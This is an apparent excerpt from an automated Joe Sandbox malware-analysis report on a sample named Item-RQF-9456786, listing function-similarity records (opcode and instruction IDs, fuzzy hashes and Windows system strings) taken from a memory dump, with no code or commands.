                                                                                    • Instruction ID: e6cd202b16fc595f3a1bb8aed7baaa13bddfd9b978bb5464d4a3c53912e9dc2f
                                                                                    • Opcode Fuzzy Hash: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                                                    • Instruction Fuzzy Hash: CC519A715047428FD724EF68C444AA7FBE4AFC4308F644E3EEAEA87241E770A545CB92
                                                                                    Strings
                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                                                    • Instruction ID: 0202c504af76c636a9454b9fda2ce6feb1891ddf0dba23fbd0ba0baf248917d2
                                                                                    • Opcode Fuzzy Hash: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                                                    • Instruction Fuzzy Hash: 7C41E130A04659DBEB12CF6DC894B6EBBB5FF85300F1441A5E900DB291E7B5DA40CB41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    • Opcode ID: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                                                    • Instruction ID: 8449aaa76f2dc418e5a0ff2cb4cf5c349369a78130bda45f353e80901d28f71e
                                                                                    • Opcode Fuzzy Hash: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                                                    • Instruction Fuzzy Hash: DD01D1B2244708EFE311DF14CD49B26B7F8FB84715F058979A648C7190E374D904CB46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                                                    • Instruction ID: 94453ae562ebc6daa369c65ab1f43bdfcf6fc7832dea6bc3d6af40b7d38bd2e1
                                                                                    • Opcode Fuzzy Hash: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                                                    • Instruction Fuzzy Hash: 19827B75E002189FEB25CFA9C884BEDFBB5BF88310F548269E919AB751D7309981CF50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                                                    • Instruction ID: 144ea78823a1c5e9a9e1a31fabaa4d8a1a1489511fe93c58af4001965c673129
                                                                                    • Opcode Fuzzy Hash: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                                                    • Instruction Fuzzy Hash: CE916771900229AFEB22DF95CD85FAEBBB8EF18B50F204059F600EB195E774AD40CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    • Opcode ID: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                                                    • Instruction ID: ae04b588e86351c7b0ac8a90374a4e18ff1a0bc04df4dcf791531cf0e3712640
                                                                                    • Opcode Fuzzy Hash: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                                                    • Instruction Fuzzy Hash: 08716FB6E0020ACFDF28CF9CD5906ADBBB5BF48710F24852EE945E7248E7719A41CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .mui
                                                                                    • API String ID: 0-1199573805
                                                                                    • Opcode ID: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                                                    • Instruction ID: 7925e3e0f553ff873d11362ca8a676235e334398f0ada4693333bf3eab9ca0e5
                                                                                    • Opcode Fuzzy Hash: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                                                    • Instruction Fuzzy Hash: 12519172D0022E9BDF10DF99D844BAEFBB4AF08B54F054129EA11FB255DB349A01CBE4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    • Opcode ID: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                                                    • Instruction ID: b7d58deb7cc90963252eb6ac6c1b5ebeac5f0ec5234f305d9de43ae0b65d65ab
                                                                                    • Opcode Fuzzy Hash: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                                                    • Instruction Fuzzy Hash: BA417072508342ABD711DA75D884BEBFBE8AF88B14F440A2DF684D7280EB74D944C796
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AlternateCodePage
                                                                                    • API String ID: 0-3889302423
                                                                                    • Opcode ID: 093f55d4c0b9f4c9fada2d6dc2bad124431ae9447b7bafe26b0a70c87c5d7019
                                                                                    • Instruction ID: dae542d25530b2101bacdf144531cdca4bfb9e5e8ddd6a773c4517859b55f827
                                                                                    • Opcode Fuzzy Hash: 093f55d4c0b9f4c9fada2d6dc2bad124431ae9447b7bafe26b0a70c87c5d7019
                                                                                    • Instruction Fuzzy Hash: 1C41D176D00209AADF25DB98C888AEFFBF8FF44710F20415EE616A7254D7309A45CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                                                    • Instruction ID: eae4daf10ff13b91d351460383e18c523a88414715315124ce99cff58efdc6f9
                                                                                    • Opcode Fuzzy Hash: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                                                    • Instruction Fuzzy Hash: F44142B2D4022DAADB21DB54CC84FDEB7BCAB44714F0045A5EB08EB145DB709F898FA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    • Opcode ID: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                                                    • Instruction ID: 5946c84e1bcd33f50f9f724baf521927bf96112e6e9fc953a125430dd273c517
                                                                                    • Opcode Fuzzy Hash: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                                                    • Instruction Fuzzy Hash: 1231FE31A00719ABDB22DB6DC854BEEBBF4DF55704F284068E941DB282E775DB06CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    • Opcode ID: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                                                    • Instruction ID: 0cc54062ad31c98313f2364a27aba55ad2e9678629277c1811cd748a43e42e51
                                                                                    • Opcode Fuzzy Hash: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                                                    • Instruction Fuzzy Hash: E931D177A40519AFEB16DB59C845E6FBBB8FB80720F014129E905E7255D730AE04DBE0
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    • Opcode ID: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                                                    • Instruction ID: 97b68c095d8a05cd39094598003da0ca45033e152ecb5eb98e440abcc7a504d6
                                                                                    • Opcode Fuzzy Hash: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                                                    • Instruction Fuzzy Hash: E001F7323002319BEF276F9AD8C4B6A7BA5EF82754F08011DF64186555CB207AC0C792
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                                                    • Instruction ID: cd0c04fab7fc9366772328b9c24abe4154d83e1162bbd54109144cbc8d9144c3
                                                                                    • Opcode Fuzzy Hash: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                                                    • Instruction Fuzzy Hash: FC42C53560C3498BE725CF68D890A6FFBE6AF88704F04092DFA82D7250DB71DA45CB52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                                                    • Instruction ID: 1c5031d33e243d2523a3bda428cec4d85bc798be092cc7b8514bd3158e8524a0
                                                                                    • Opcode Fuzzy Hash: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                                                    • Instruction Fuzzy Hash: A3424275E102198FEB25CF69C881BADFBF5BF89300F188199E949EB241D7349A85CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                                                    • Instruction ID: 09d670deff33227186743ce2ea9891a705627e284390fa1342991dd26eaa4988
                                                                                    • Opcode Fuzzy Hash: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                                                    • Instruction Fuzzy Hash: 9F32DF70A007598FDB66CF69CC847BABBF2BF84304F24411DE556DB285E735AA21CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                                                    • Instruction ID: 0daf9a6aebe6519eed4b9684641d584cd4ac8d73426f51147c1a9e4e02c0daa9
                                                                                    • Opcode Fuzzy Hash: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                                                    • Instruction Fuzzy Hash: 7222C2742446698BEB2DCF2DC094376BBF1AF44304F08845AE997CF286EB35D652DB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                                                    • Instruction ID: 8b6faa3d61cb7bffe2f6e5ec16c2f13c35559ed388bc409c25cd5c6fd987c9db
                                                                                    • Opcode Fuzzy Hash: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                                                    • Instruction Fuzzy Hash: DC32AE71A01209CFDB25CF68C884AAAF7F1FF88310F684669E955EB391D734E941CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                    • Instruction ID: 97e43d292e6b0621cb476774175645ac0d2f51d18b30d3f75c71de6a4729ec2c
                                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                    • Instruction Fuzzy Hash: 43F17074E0020A9BDB25DF99C994BAEFBF5AF48B10F04812DE902EB354E734E941CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                                                    • Instruction ID: 74cefc0a1422cf707b425ee100eae59c8c003b51e157a5df0008ddafd1b190b4
                                                                                    • Opcode Fuzzy Hash: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                                                    • Instruction Fuzzy Hash: 2DD1D471A0060A9BDF15CF69C841AFEB7F1AFC9304F1C8269E955E7241D735EA068B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                                                    • Instruction ID: 6a6d744c21ac7b3df6a6dc737763c1590856ba30b3d24ee5f0211c8b63ce3225
                                                                                    • Opcode Fuzzy Hash: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                                                    • Instruction Fuzzy Hash: 6DE17871608342CFC715CF28C494A6AFBE0BF89314F598A6DF99987351EB31E905CB92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                                                    • Instruction ID: 5f7b8f96c74019fefedfac4daa078a9291025d66b48c0851f4ae4f75437d74e4
                                                                                    • Opcode Fuzzy Hash: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                                                    • Instruction Fuzzy Hash: A3D1EF71A0020A9BDF14CF68D880ABFF7B5BF55304F14426DEA12DB290EB34E958CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                    • Instruction ID: 3168b28e44b09dbc41e0bd281fe915e0e8d035ce6f4c49b9db724e5c1f7b6eb1
                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                    • Instruction Fuzzy Hash: EBB1A274A00619AFDF26DB98C940AABBBF5FF86304F14445DEA02D7790DB74EA85CB10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction ID: f5fb7a2338aa8ba4a22fd2ea885475944e8e4d4adc594f179a227b4f7945ba95
                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                    • Instruction Fuzzy Hash: 78B1D73160064AAFDB26DB68C894BBFFBF6AF44304F144599E652D7285DB30DE41CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                                                    • Instruction ID: 365c54488afc685f2bcca24b2f5e6cb622264f015d7614d835aad79984610b2d
                                                                                    • Opcode Fuzzy Hash: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                                                    • Instruction Fuzzy Hash: 90C159742083458FE764CF19C498BABF7E5BF88304F54496DE98987291E774EA08CF92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                                                    • Instruction ID: ba244a815379440cc9020d5ba61e917d475edac33734b83dd28a432619332f1a
                                                                                    • Opcode Fuzzy Hash: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                                                    • Instruction Fuzzy Hash: 85B17170A002668BDF65CF68D890BA9F7F5EF44700F1485E9D50AE7385EB309E89CB21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                                                    • Instruction ID: 27daead4cbb9c3ef54b4ccc603e27d66b150ea4d87c7334cbaebaf07434c1165
                                                                                    • Opcode Fuzzy Hash: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                                                    • Instruction Fuzzy Hash: 33A1E531E006599FEB32DB58CC48BADFFA4AB05B14F154169EB01EB2D1DB749E40CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                                                    • Instruction ID: 2e252fe47a24401ddc723786c5b2cb5dc243eb77ab5f307ff7ff5473ce3ca69b
                                                                                    • Opcode Fuzzy Hash: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                                                    • Instruction Fuzzy Hash: 97A10271B006169FDB24CF69C998BAAF7F5FF49318F104029EA05E7285DBB4E911CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                                                    • Instruction ID: 3b3051312ee83dfd7087bcb1ca103fbc3e4201780476233368473b3c88b756ec
                                                                                    • Opcode Fuzzy Hash: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                                                    • Instruction Fuzzy Hash: 7AA1EC72A04216EFC722DF28C984B6ABBE9FF48744F150928F589DB655D334EE40CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                                                    • Instruction ID: e2fc196847533b233ca84e1feb3102de72cb428188739bbb4262b9ea311b8977
                                                                                    • Opcode Fuzzy Hash: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                                                    • Instruction Fuzzy Hash: C0918871D00125AFDB16CF58D884BAEBFB5EF49710F254159EA10EB345E734EE409BA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                                                    • Instruction ID: d347fb7dd2dd8eec16ea0a121ba7dc8e71ccc60dc2e8c91305d7b66f8cd8d252
                                                                                    • Opcode Fuzzy Hash: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                                                    • Instruction Fuzzy Hash: C7912531A00616CBDB259B58C8C4BF9FBA1EF84714F2540A9F905DB386FB38DA41C791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                                                    • Instruction ID: b10ee2e88ea09f28ed10910c084c207982b23d41a7edb48dc2a3d5b2f47a1875
                                                                                    • Opcode Fuzzy Hash: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                                                    • Instruction Fuzzy Hash: 9B815E71A0061A9BDB24CF69C944ABFFBF9FB48700F14852EE555D7641E334E940CBA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                    • Instruction ID: 7caa9fab62ad76711b1a7158866fb0912d9c7a4fc7f9e1328bc0f77ba71bcd30
                                                                                    • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                    • Instruction Fuzzy Hash: 20817271A002099FDF1DCF58C890AAEBBBAFF94314F148569D916EB344DB34DA41CB50
                                                                                    Memory Dump Source
